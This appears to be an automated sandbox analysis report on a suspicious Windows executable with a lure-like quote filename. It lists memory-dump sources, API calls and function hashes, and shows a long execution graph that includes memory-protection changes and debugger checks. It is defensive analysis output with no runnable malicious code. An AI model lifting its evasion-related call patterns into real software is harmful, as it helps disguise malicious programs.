                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                          • API String ID: 1100898210-3355392842
                                                                                                                                                                                                                          • Opcode ID: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                                                                                                                                                                                          • Instruction ID: c0ef5988400ca03a2919d730679f4c8cdc7c60ab336a91eb80d60266565c467d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2E0C2735015309BC6212F45ED0871EB7ACAF59B22F0580BAF8907B26087781C428FD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe,C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",00403536,?), ref: 00405A56
                                                                                                                                                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe,C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",00403536,?), ref: 00405A66
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                          • API String ID: 2709904686-3370423016
                                                                                                                                                                                                                          • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                                                                                                                                                          • Instruction ID: 94586c4fc4af0aa81d4ff890ae3cf2b30e5be6a9e55ec7b9bf63862dfaa4d6e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0ED05EB2411920AAC312A714DD44DAF73ACEF123007464466F441A6161D7785D818AAD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26299321019.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299286823.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299354643.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299386915.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_10000000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                                                                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB2
                                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC3
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                                          • Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                                                                                                                                                          • Instruction ID: 8848f7d8d782bbf7f3224fb8fd0babd0dea9e1ab2e05ea72f699364142252924
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72F0C231100914EFCB029FA5CD4099FBFB8EF06350B2540A9E840F7311D674FE019BA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:4.5%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                                                                          Signature Coverage:1.6%
                                                                                                                                                                                                                          Total number of Nodes:1643
                                                                                                                                                                                                                          Total number of Limit Nodes:13
                                                                                                                                                                                                                          execution_graph 7144 33e121a1 7147 33e12418 7144->7147 7148 33e12420 7147->7148 7151 33e147f5 7148->7151 7150 33e121bc 7152 33e14804 7151->7152 7153 33e14808 7151->7153 7152->7150 7156 33e14815 7153->7156 7157 33e15b7a 20 API calls 7156->7157 7160 33e1482c 7157->7160 7158 33e12ada 5 API calls 7159 33e14811 7158->7159 7159->7150 7160->7158 6448 33e1a1e0 6451 33e1a1fe 6448->6451 6450 33e1a1f6 6452 33e1a203 6451->6452 6453 33e1a298 6452->6453 6456 33e1aa53 6452->6456 6453->6450 6457 33e1aa70 RtlDecodePointer 6456->6457 6459 33e1aa80 6456->6459 6457->6459 6458 33e12ada 5 API calls 6461 33e1a42f 6458->6461 6460 33e1ab0d 6459->6460 6462 33e1ab02 6459->6462 6464 33e1aab7 6459->6464 6460->6462 6463 33e16368 20 API calls 6460->6463 6461->6450 6462->6458 6463->6462 6464->6462 6465 33e16368 20 API calls 6464->6465 6465->6462 7161 33e181a0 7162 33e181d9 7161->7162 7163 33e181dd 7162->7163 7174 33e18205 7162->7174 7164 33e16368 20 API calls 7163->7164 7166 33e181e2 7164->7166 7165 33e18529 7167 33e12ada 5 API calls 7165->7167 7168 33e162ac 26 API calls 7166->7168 7169 33e18536 7167->7169 7170 33e181ed 7168->7170 7171 33e12ada 5 API calls 7170->7171 7173 33e181f9 7171->7173 7174->7165 7175 33e180c0 7174->7175 7176 33e180db 7175->7176 7177 33e12ada 5 API calls 7176->7177 7178 33e18152 7177->7178 7178->7174 6466 33e19ae4 6469 33e18c9e RtlLeaveCriticalSection 6466->6469 6468 33e19aea 6469->6468 5752 33e1c7a7 5753 33e1c7be 5752->5753 5757 33e1c82c 5752->5757 5753->5757 5764 33e1c7e6 GetModuleHandleA 5753->5764 5755 33e1c872 5756 33e1c835 GetModuleHandleA 5758 33e1c83f 5756->5758 5757->5755 5757->5756 5757->5758 5758->5757 5759 33e1c85f GetProcAddress 5758->5759 5759->5757 5760 33e1c7dd 5760->5757 5760->5758 5761 33e1c800 GetProcAddress 5760->5761 5761->5757 5762 33e1c80d VirtualProtect 5761->5762 5762->5757 5763 33e1c81c VirtualProtect 5762->5763 5763->5757 5765 33e1c7ef 5764->5765 5771 33e1c82c 5764->5771 5776 33e1c803 GetProcAddress 5765->5776 5767 33e1c7f4 5770 33e1c800 GetProcAddress 5767->5770 5767->5771 5768 33e1c872 5769 33e1c835 GetModuleHandleA 5773 33e1c83f 5769->5773 5770->5771 5772 33e1c80d VirtualProtect 5770->5772 5771->5768 5771->5769 5771->5773 5772->5771 5774 33e1c81c VirtualProtect 5772->5774 5773->5771 5775 33e1c85f GetProcAddress 5773->5775 5774->5771 5775->5771 5777 33e1c82c 5776->5777 5778 33e1c80d VirtualProtect 5776->5778 5780 33e1c872 5777->5780 5781 33e1c835 GetModuleHandleA 5777->5781 5778->5777 5779 33e1c81c VirtualProtect 5778->5779 5779->5777 5783 33e1c83f 5781->5783 5782 33e1c85f GetProcAddress 5782->5783 5783->5777 5783->5782 7304 33e1ac6b 7305 33e1ac84 7304->7305 7307 33e1acad 7305->7307 7308 33e1b2f0 7305->7308 7309 33e1b329 7308->7309 7310 33e1b5c1 RaiseException 7309->7310 7311 33e1b350 7309->7311 7310->7311 7312 33e1b393 7311->7312 7313 33e1b36e 7311->7313 7314 33e1b8b2 20 API calls 7312->7314 7319 33e1b8e1 7313->7319 7316 33e1b38e 7314->7316 7317 33e12ada 5 API calls 7316->7317 7318 33e1b3b7 7317->7318 7318->7307 7320 33e1b8f0 7319->7320 7321 33e1b964 7320->7321 7322 33e1b90f 7320->7322 7324 33e1b8b2 20 API calls 7321->7324 7323 33e178a3 5 API calls 7322->7323 7325 33e1b950 7323->7325 7326 33e1b95d 7324->7326 7325->7326 7327 33e1b8b2 20 API calls 7325->7327 7326->7316 7327->7326 7592 33e1742b 7593 33e17430 7592->7593 7595 33e17453 7593->7595 7596 33e18bae 7593->7596 7597 33e18bbb 7596->7597 7601 33e18bdd 7596->7601 7598 33e18bd7 7597->7598 7599 33e18bc9 RtlDeleteCriticalSection 7597->7599 7600 33e1571e 20 API calls 7598->7600 7599->7598 7599->7599 7600->7601 7601->7593 7179 33e160ac 7181 33e160b7 7179->7181 7182 33e160dd 7179->7182 7180 33e160c7 FreeLibrary 7180->7181 7181->7180 7181->7182 7328 33e1506f 7329 33e15081 7328->7329 7330 33e15087 7328->7330 7331 33e15000 20 API calls 7329->7331 7331->7330 7332 33e19e71 7333 33e19e95 7332->7333 7334 33e1ac6b 7333->7334 7335 33e19eae 7333->7335 7338 33e1b2f0 21 API calls 7334->7338 7339 33e1acad 7334->7339 7336 33e19ef8 7335->7336 7337 33e1aa53 21 API calls 7335->7337 7337->7336 7338->7339 6470 33e163f0 6471 33e16400 6470->6471 6472 33e16416 6470->6472 6473 33e16368 20 API calls 6471->6473 6481 33e16561 6472->6481 6483 33e16480 6472->6483 6492 33e16580 6472->6492 6474 33e16405 6473->6474 6489 33e162ac 6474->6489 6477 33e1640f 6479 33e164ee 6480 33e1571e 20 API calls 6479->6480 6480->6481 6518 33e1679a 6481->6518 6482 33e164e5 6482->6479 6482->6482 6486 33e16573 6482->6486 6509 33e185eb 6482->6509 6503 33e14e76 6483->6503 6524 33e162bc IsProcessorFeaturePresent 6486->6524 6488 33e1657f 6528 33e16231 6489->6528 6491 33e162b8 6491->6477 6493 33e1658c 6492->6493 6493->6493 6494 33e1637b 20 API calls 6493->6494 6495 33e165ba 6494->6495 6496 33e185eb 26 API calls 6495->6496 6497 33e165e6 6496->6497 6498 33e162bc 11 API calls 6497->6498 6499 33e16615 6498->6499 6500 33e166b6 FindFirstFileExA 6499->6500 6501 33e16705 6500->6501 6502 33e16580 26 API calls 6501->6502 6504 33e14e8b 6503->6504 6505 33e14e87 6503->6505 6504->6505 6506 33e1637b 20 API calls 6504->6506 6505->6482 6507 33e14eb9 6506->6507 6508 33e1571e 20 API calls 6507->6508 6508->6505 6510 33e1853a 6509->6510 6512 33e18554 6510->6512 6514 33e1854f 6510->6514 6516 33e1858b 6510->6516 6511 33e16368 20 API calls 6513 33e1857a 6511->6513 6512->6482 6515 33e162ac 26 API calls 6513->6515 6514->6511 6514->6512 6515->6512 6516->6512 6517 33e16368 20 API calls 6516->6517 6517->6513 6522 33e167a4 6518->6522 6519 33e167b4 6521 33e1571e 20 API calls 6519->6521 6520 33e1571e 20 API calls 6520->6522 6523 33e167bb 6521->6523 6522->6519 6522->6520 6523->6477 6525 33e162c7 6524->6525 6539 33e160e2 6525->6539 6529 33e15b7a 20 API calls 6528->6529 6530 33e16247 6529->6530 6531 33e16255 6530->6531 6532 33e162a6 6530->6532 6536 33e12ada 5 API calls 6531->6536 6533 33e162bc 11 API calls 6532->6533 6534 33e162ab 6533->6534 6535 33e16231 26 API calls 6534->6535 6537 33e162b8 6535->6537 6538 33e1627c 6536->6538 6537->6491 6538->6491 6540 33e160fe 6539->6540 6541 33e1612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6540->6541 6542 33e161fb 6541->6542 6543 33e12ada 5 API calls 6542->6543 6544 33e16219 GetCurrentProcess TerminateProcess 6543->6544 6544->6488 7340 33e13370 7351 33e13330 7340->7351 7352 33e13342 7351->7352 7353 33e1334f 7351->7353 7354 33e12ada 5 API calls 7352->7354 7354->7353 7602 33e15630 7603 33e1563b 7602->7603 7604 33e15eb7 11 API calls 7603->7604 7605 33e15664 7603->7605 7607 33e15660 7603->7607 7604->7603 7608 33e15688 7605->7608 7609 33e15695 7608->7609 7611 33e156b4 7608->7611 7610 33e1569f RtlDeleteCriticalSection 7609->7610 7610->7610 7610->7611 7611->7607 7187 33e13eb3 7190 33e15411 7187->7190 7191 33e1541d 7190->7191 7192 33e15af6 38 API calls 7191->7192 7195 33e15422 7192->7195 7193 33e155a8 38 API calls 7194 33e1544c 7193->7194 7195->7193 7612 33e19a36 7613 33e16355 20 API calls 7612->7613 7614 33e19a3b 7613->7614 7615 33e16368 20 API calls 7614->7615 7616 33e19a43 7615->7616 7196 33e19db8 7198 33e19dbf 7196->7198 7197 33e19e20 7201 33e1a90e 7197->7201 7205 33e1aa17 7197->7205 7198->7197 7199 33e19ddf 7198->7199 7199->7201 7203 33e1aa17 21 API calls 7199->7203 7204 33e1a93e 7203->7204 7206 33e1aa20 7205->7206 7209 33e1b19b 7206->7209 7210 33e1b1da 7209->7210 7215 33e1b25c 7210->7215 7219 33e1b59e 7210->7219 7212 33e1b286 7214 33e1b292 7212->7214 7226 33e1b8b2 7212->7226 7217 33e12ada 5 API calls 7214->7217 7215->7212 7222 33e178a3 7215->7222 7218 33e19e6e 7217->7218 7233 33e1b5c1 7219->7233 7223 33e178cb 7222->7223 7224 33e12ada 5 API calls 7223->7224 7225 33e178e8 7224->7225 7225->7212 7227 33e1b8d4 7226->7227 7228 33e1b8bf 7226->7228 7229 33e16368 20 API calls 7227->7229 7230 33e16368 20 API calls 7228->7230 7231 33e1b8d9 7228->7231 7229->7231 7232 33e1b8cc 7230->7232 7231->7214 7232->7214 7234 33e1b5ec 7233->7234 7235 33e1b7e5 RaiseException 7234->7235 7236 33e1b5bc 7235->7236 7236->7215 7617 33e1543d 7618 33e15440 7617->7618 7619 33e155a8 38 API calls 7618->7619 7620 33e1544c 7619->7620 6545 33e15bff 6553 33e15d5c 6545->6553 6548 33e15c13 6549 33e15b7a 20 API calls 6550 33e15c1b 6549->6550 6551 33e15c28 6550->6551 6552 33e15c2b 11 API calls 6550->6552 6552->6548 6554 33e15c45 5 API calls 6553->6554 6555 33e15d83 6554->6555 6556 33e15d9b TlsAlloc 6555->6556 6557 33e15d8c 6555->6557 6556->6557 6558 33e12ada 5 API calls 6557->6558 6559 33e15c09 6558->6559 6559->6548 6559->6549 6560 33e19aff 6561 33e162ac 26 API calls 6560->6561 6562 33e19b04 6561->6562 7237 33e167bf 7242 33e167f4 7237->7242 7239 33e167db 7241 33e1571e 20 API calls 7241->7239 7243 33e167cd 7242->7243 7244 33e16806 7242->7244 7243->7239 7243->7241 7245 33e16836 7244->7245 7246 33e1680b 7244->7246 7245->7243 7253 33e171d6 7245->7253 7247 33e1637b 20 API calls 7246->7247 7249 33e16814 7247->7249 7251 33e1571e 20 API calls 7249->7251 7250 33e16851 7252 33e1571e 20 API calls 7250->7252 7251->7243 7252->7243 7254 33e171e1 7253->7254 7255 33e17209 7254->7255 7257 33e171fa 7254->7257 7256 33e17218 7255->7256 7262 33e18a98 7255->7262 7269 33e18acb 7256->7269 7259 33e16368 20 API calls 7257->7259 7261 33e171ff 7259->7261 7261->7250 7263 33e18aa3 7262->7263 7264 33e18ab8 RtlSizeHeap 7262->7264 7265 33e16368 20 API calls 7263->7265 7264->7256 7266 33e18aa8 7265->7266 7267 33e162ac 26 API calls 7266->7267 7268 33e18ab3 7267->7268 7268->7256 7270 33e18ae3 7269->7270 7271 33e18ad8 7269->7271 7273 33e18aeb 7270->7273 7279 33e18af4 7270->7279 7272 33e156d0 21 API calls 7271->7272 7277 33e18ae0 7272->7277 7274 33e1571e 20 API calls 7273->7274 7274->7277 7275 33e18af9 7278 33e16368 20 API calls 7275->7278 7276 33e18b1e RtlReAllocateHeap 7276->7277 7276->7279 7277->7261 7278->7277 7279->7275 7279->7276 7280 33e1474f 7 API calls 7279->7280 7280->7279 7281 33e17a80 7282 33e17a8d 7281->7282 7283 33e1637b 20 API calls 7282->7283 7284 33e17aa7 7283->7284 7285 33e1571e 20 API calls 7284->7285 7286 33e17ab3 7285->7286 7287 33e1637b 20 API calls 7286->7287 7291 33e17ad9 7286->7291 7288 33e17acd 7287->7288 7290 33e1571e 20 API calls 7288->7290 7289 33e15eb7 11 API calls 7289->7291 7290->7291 7291->7289 7292 33e17ae5 7291->7292 7355 33e18640 7358 33e18657 7355->7358 7359 33e18665 7358->7359 7360 33e18679 7358->7360 7361 33e16368 20 API calls 7359->7361 7362 33e18681 7360->7362 7363 33e18693 7360->7363 7364 33e1866a 7361->7364 7365 33e16368 20 API calls 7362->7365 7366 33e154a7 38 API calls 7363->7366 7369 33e18652 7363->7369 7367 33e162ac 26 API calls 7364->7367 7368 33e18686 7365->7368 7366->7369 7367->7369 7370 33e162ac 26 API calls 7368->7370 7370->7369 7371 33e1af43 7372 33e1af59 7371->7372 7373 33e1af4d 7371->7373 7373->7372 7374 33e1af52 CloseHandle 7373->7374 7374->7372 7621 33e15303 7624 33e150a5 7621->7624 7633 33e1502f 7624->7633 7627 33e1502f 5 API calls 7628 33e150c3 7627->7628 7629 33e15000 20 API calls 7628->7629 7630 33e150ce 7629->7630 7631 33e15000 20 API calls 7630->7631 7632 33e150d9 7631->7632 7634 33e15048 7633->7634 7635 33e12ada 5 API calls 7634->7635 7636 33e15069 7635->7636 7636->7627 7637 33e17103 GetCommandLineA GetCommandLineW 7375 33e1a945 7377 33e1a96d 7375->7377 7376 33e1a9a5 7377->7376 7378 33e1a997 7377->7378 7379 33e1a99e 7377->7379 7380 33e1aa17 21 API calls 7378->7380 7384 33e1aa00 7379->7384 7382 33e1a99c 7380->7382 7385 33e1aa20 7384->7385 7386 33e1b19b 21 API calls 7385->7386 7387 33e1a9a3 7386->7387 6563 33e17bc7 6564 33e17bd3 6563->6564 6565 33e17c0a 6564->6565 6571 33e15671 RtlEnterCriticalSection 6564->6571 6567 33e17be7 6572 33e17f86 6567->6572 6571->6567 6573 33e17f94 6572->6573 6575 33e17bf7 6572->6575 6573->6575 6579 33e17cc2 6573->6579 6576 33e17c10 6575->6576 6693 33e156b9 RtlLeaveCriticalSection 6576->6693 6578 33e17c17 6578->6565 6580 33e17d42 6579->6580 6585 33e17cd8 6579->6585 6582 33e1571e 20 API calls 6580->6582 6605 33e17d90 6580->6605 6583 33e17d64 6582->6583 6584 33e1571e 20 API calls 6583->6584 6586 33e17d77 6584->6586 6585->6580 6588 33e1571e 20 API calls 6585->6588 6601 33e17d0b 6585->6601 6591 33e1571e 20 API calls 6586->6591 6587 33e1571e 20 API calls 6593 33e17d37 6587->6593 6590 33e17d00 6588->6590 6589 33e17d9e 6594 33e17dfe 6589->6594 6604 33e1571e 20 API calls 6589->6604 6607 33e190ba 6590->6607 6596 33e17d85 6591->6596 6592 33e1571e 20 API calls 6597 33e17d22 6592->6597 6598 33e1571e 20 API calls 6593->6598 6599 33e1571e 20 API calls 6594->6599 6602 33e1571e 20 API calls 6596->6602 6635 33e191b8 6597->6635 6598->6580 6600 33e17e04 6599->6600 6600->6575 6601->6592 6606 33e17d2d 6601->6606 6602->6605 6604->6589 6647 33e17e35 6605->6647 6606->6587 6608 33e190cb 6607->6608 6634 33e191b4 6607->6634 6609 33e190dc 6608->6609 6610 33e1571e 20 API calls 6608->6610 6611 33e190ee 6609->6611 6612 33e1571e 20 API calls 6609->6612 6610->6609 6613 33e19100 6611->6613 6614 33e1571e 20 API calls 6611->6614 6612->6611 6615 33e19112 6613->6615 6617 33e1571e 20 API calls 6613->6617 6614->6613 6616 33e19124 6615->6616 6618 33e1571e 20 API calls 6615->6618 6619 33e19136 6616->6619 6620 33e1571e 20 API calls 6616->6620 6617->6615 6618->6616 6621 33e19148 6619->6621 6622 33e1571e 20 API calls 6619->6622 6620->6619 6623 33e1915a 6621->6623 6625 33e1571e 20 API calls 6621->6625 6622->6621 6624 33e1916c 6623->6624 6626 33e1571e 20 API calls 6623->6626 6627 33e1571e 20 API calls 6624->6627 6628 33e1917e 6624->6628 6625->6623 6626->6624 6627->6628 6629 33e1571e 20 API calls 6628->6629 6631 33e19190 6628->6631 6629->6631 6630 33e191a2 6633 33e1571e 20 API calls 6630->6633 6630->6634 6631->6630 6632 33e1571e 20 API calls 6631->6632 6632->6630 6633->6634 6634->6601 6636 33e191c5 6635->6636 6646 33e1921d 6635->6646 6637 33e191d5 6636->6637 6638 33e1571e 20 API calls 6636->6638 6639 33e1571e 20 API calls 6637->6639 6643 33e191e7 6637->6643 6638->6637 6639->6643 6640 33e1571e 20 API calls 6641 33e191f9 6640->6641 6642 33e1920b 6641->6642 6644 33e1571e 20 API calls 6641->6644 6645 33e1571e 20 API calls 6642->6645 6642->6646 6643->6640 6643->6641 6644->6642 6645->6646 6646->6606 6648 33e17e42 6647->6648 6652 33e17e60 6647->6652 6648->6652 6653 33e1925d 6648->6653 6651 33e1571e 20 API calls 6651->6652 6652->6589 6654 33e17e5a 6653->6654 6655 33e1926e 6653->6655 6654->6651 6689 33e19221 6655->6689 6658 33e19221 20 API calls 6659 33e19281 6658->6659 6660 33e19221 20 API calls 6659->6660 6661 33e1928c 6660->6661 6662 33e19221 20 API calls 6661->6662 6663 33e19297 6662->6663 6664 33e19221 20 API calls 6663->6664 6665 33e192a5 6664->6665 6666 33e1571e 20 API calls 6665->6666 6667 33e192b0 6666->6667 6668 33e1571e 20 API calls 6667->6668 6669 33e192bb 6668->6669 6670 33e1571e 20 API calls 6669->6670 6671 33e192c6 6670->6671 6672 33e19221 20 API calls 6671->6672 6673 33e192d4 6672->6673 6674 33e19221 20 API calls 6673->6674 6675 33e192e2 6674->6675 6676 33e19221 20 API calls 6675->6676 6677 33e192f3 6676->6677 6678 33e19221 20 API calls 6677->6678 6679 33e19301 6678->6679 6680 33e19221 20 API calls 6679->6680 6681 33e1930f 6680->6681 6682 33e1571e 20 API calls 6681->6682 6683 33e1931a 6682->6683 6684 33e1571e 20 API calls 6683->6684 6685 33e19325 6684->6685 6686 33e1571e 20 API calls 6685->6686 6687 33e19330 6686->6687 6688 33e1571e 20 API calls 6687->6688 6688->6654 6690 33e19258 6689->6690 6691 33e19248 6689->6691 6690->6658 6691->6690 6692 33e1571e 20 API calls 6691->6692 6692->6691 6693->6578 6694 33e1a1c6 IsProcessorFeaturePresent 7293 33e18a89 7294 33e16d60 51 API calls 7293->7294 7295 33e18a8e 7294->7295 7388 33e15348 7389 33e13529 8 API calls 7388->7389 7390 33e1534f 7389->7390 7391 33e17b48 7401 33e18ebf 7391->7401 7395 33e17b55 7414 33e1907c 7395->7414 7398 33e17b7f 7399 33e1571e 20 API calls 7398->7399 7400 33e17b8a 7399->7400 7418 33e18ec8 7401->7418 7403 33e17b50 7404 33e18fdc 7403->7404 7405 33e18fe8 7404->7405 7438 33e15671 RtlEnterCriticalSection 7405->7438 7407 